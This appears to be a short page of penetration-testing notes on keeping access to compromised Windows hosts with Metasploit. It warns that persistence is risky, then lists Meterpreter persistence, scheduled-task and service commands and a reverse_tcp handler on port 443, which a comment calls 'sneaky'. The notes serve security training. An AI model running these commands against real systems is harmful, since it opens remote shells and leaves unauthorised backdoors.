Maintaining Access

Persistence is dangerous and usually unnecessary for junior-mid level pentesting (time limited engagements, not red teaming). It opens a port on a machine with no credentials--leaves it wide open for a future attack. You'll have to go back in and delete the service and remove it from the registry. It'll give you an RC file to go in and delete the files for you, but it's generally dangerous and unnecessary.

Persistence Scripts

meterpreter > run persistence -h

If you want to get a meterpreter shell back:

msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
# might set lport to be a known port to be sneaky
msf5 exploit(multi/handler) > set lport 443
msf5 exploit(multi/handler) > set lhost

Scheduled Tasks

run scheduleme
run schtaskabuse


run metsvc -A

Last updated